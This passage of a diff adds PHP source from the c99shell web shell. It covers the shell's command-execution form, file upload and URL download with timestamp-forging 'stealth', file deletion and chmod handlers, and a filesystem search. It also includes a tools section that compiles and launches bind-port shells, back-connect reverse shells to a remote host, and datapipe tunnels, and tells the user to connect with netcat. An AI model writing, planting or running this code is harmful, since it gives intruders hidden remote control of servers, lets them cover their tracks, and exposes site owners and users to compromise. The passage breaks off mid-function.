+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>^";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
